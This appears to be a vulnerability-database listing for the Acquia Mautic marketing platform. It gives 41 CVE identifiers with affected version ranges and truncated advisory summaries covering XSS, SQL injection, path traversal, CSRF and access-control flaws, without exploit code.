Product
acquia mautic
41 known vulnerabilities across versions
Vulnerabilities are listed by affected version. Select any CVE for the full briefing and its intelligence graph.
CVE-2026-3105
CVE-2024-47055
CVE-2024-47053
CVE-2024-47051
CVE-2022-25773
CVE-2024-47059
CVE-2022-25770
CVE-2021-27917
CVE-2024-47058
CVE-2024-47050
CVE-2022-25768
CVE-2022-25777
CVE-2022-25776
CVE-2022-25775
CVE-2022-25774
CVE-2022-25769
CVE-2021-27916
CVE-2021-27915
CVE-2022-25772
CVE-2021-27914
CVE-2021-27913
CVE-2021-27912
CVE-2021-27911
CVE-2021-27910
CVE-2021-27909
CVE-2021-27908
CVE-2020-35125
CVE-2020-35124
CVE-2020-35129
CVE-2020-35128
CVE-2018-11200
CVE-2018-11198
CVE-2018-8092
CVE-2018-8071
CVE-2018-10189
CVE-2017-1000506
CVE-2017-1000490
CVE-2017-1000489
CVE-2017-1000488
CVE-2017-1000046
CVE-2017-8874
>= 2.10.0 and < 4.4.19
SummaryThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnera
>= 5.0.0 and < 5.2.6
SummaryThis advisory addresses a security vulnerability in Mautic related to the segment cloning functionality. This vulnerability
>= 1.0.1 and < 5.2.3
This advisory addresses an authorization vulnerability in Mautic's HTTP Basic Authentication implementation. This flaw could allow
< 5.2.3
This advisory addresses two critical security vulnerabilities present in Mautic versions before 5.2.3. These vulnerabilities could
< 5.2.3
This advisory addresses a file placement vulnerability that could allow assets to be uploaded to unintended directories on the ser
all versions
When logging in with the correct username and incorrect weak password, the user receives the notification, that their password is
>= 1.0.1 and < 4.4.13
Mautic allows you to update the application via an upgrade script. The upgrade logic isn't shielded off correctly, which may lead
> 1.0.0 and < 4.4.13
Prior to this patch, a stored XSS vulnerability existed in the contact tracking and page hits report.
>= 1.0.0 and < 4.4.13
With access to edit a Mautic form, the attacker can add Cross-Site Scripting stored in the html filed. This could be used to steal
>= 2.6.0 and < 4.4.13
Prior to this patch being applied, Mautic's tracking was vulnerable to Cross-Site Scripting through the Page URL variable.
>= 1.1.3 and < 4.4.13
The logic in place to facilitate the update process via the user interface lacks access control to verify if permission exists to
>= 1.0.1 and < 4.4.12
Prior to the patched version, an authenticated user of Mautic could read system files and access the internal addresses of the app
>= 1.0.2 and < 4.4.12
Prior to the patched version, logged in users of Mautic are able to access areas of the application that they should be prevented
>= 2.14.1 and < 4.4.12
Prior to the patched version, logged in users of Mautic are vulnerable to an SQL injection vulnerability in the Reports bundle. T
< 4.4.12
Prior to the patched version, logged in users of Mautic are vulnerable to a self XSS vulnerability in the notifications within Mau
< 3.3.5
ImpactThe default .htaccess file has some restrictions in the access to PHP files to only allow specific PHP files to be executed
>= 3.3.0 and < 4.4.12
Prior to the patched version, logged in users of Mautic are vulnerable to Relative Path Traversal/Arbitrary File Deletion. Regardl
>= 1.0.0 and < 4.4.12
Prior to the patched version, there is an XSS vulnerability in the description fields within the Mautic application which could be
< 4.3.0
A cross-site scripting (XSS) vulnerability in the web tracking component of Mautic before 4.3.0 allows remote attackers to inject
< 4.3.0
A cross-site scripting (XSS) vulnerability in the installer component of Mautic before 4.3.0 allows admins to inject executable ja
< 3.3.4
The function mt_rand is used to generate session tokens, this function is cryptographically flawed due to its nature being one pse
< 3.3.4
Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack when viewing Mautic assets by utilizing inline JS in
< 3.3.4
Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack through the contact's first or last name and triggere
< 3.3.4
Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback fun
< 3.3.4
For Mautic versions prior to 3.3.4/4.0.0, there is an XSS vulnerability on Mautic's password reset page where a vulnerable paramet
< 3.3.2
In all versions prior to Mautic 3.3.2, secret parameters such as database credentials could be exposed publicly by an authorized a
< 2.16.5
A cross-site scripting (XSS) vulnerability in the forms component of Mautic before 3.2.4 allows remote attackers to inject executa
< 3.2.4
A cross-site scripting (XSS) vulnerability in the assets component of Mautic before 3.2.4 allows remote attackers to inject execut
< 3.2.4
Mautic before 3.2.4 is affected by stored XSS. An attacker with access to Social Monitoring, an application feature, could attack
>= 2.0.0 and < 2.16.5
Mautic before 3.2.4 is affected by stored XSS. An attacker with permission to manage companies, an application feature, could atta
all versions
An issue was discovered in Mautic 2.13.1. It has Stored XSS via the company name field.
all versions
An issue was discovered in Mautic 2.13.1. There is Stored XSS via the authorUrl field in config.json.
< 2.13.0
Mautic before 2.13.0 allows CSV injection.
< 2.13.0
Mautic before v2.13.0 has stored XSS via a theme config file.
>= 1.0.0 and <= 1.4.1
An issue was discovered in Mautic 1.x and 2.x before 2.13.0. It is possible to systematically emulate tracking cookies per contact
<= 2.11.0
Mautic version 2.11.0 and earlier contains a Cross Site Scripting (XSS) vulnerability in Company's name that can result in denial
all versions
Mautic versions 1.0.0 - 2.11.0 are vulnerable to allowing any authorized Mautic user session (must be logged into Mautic) to use t
all versions
Mautic versions 2.0.0 - 2.11.0 with a SSO plugin installed could allow a disabled user to still login using email address
all versions
Mautic version 2.1.0 - 2.11.0 is vulnerable to an inline JS XSS attack when using Mautic forms on a Mautic landing page using GET
<= 2.6.1
Mautic 2.6.1 and earlier fails to set flags on session cookies
all versions
Multiple cross-site request forgery (CSRF) vulnerabilities in Mautic 1.4.1 allow remote attackers to hijack the authentication of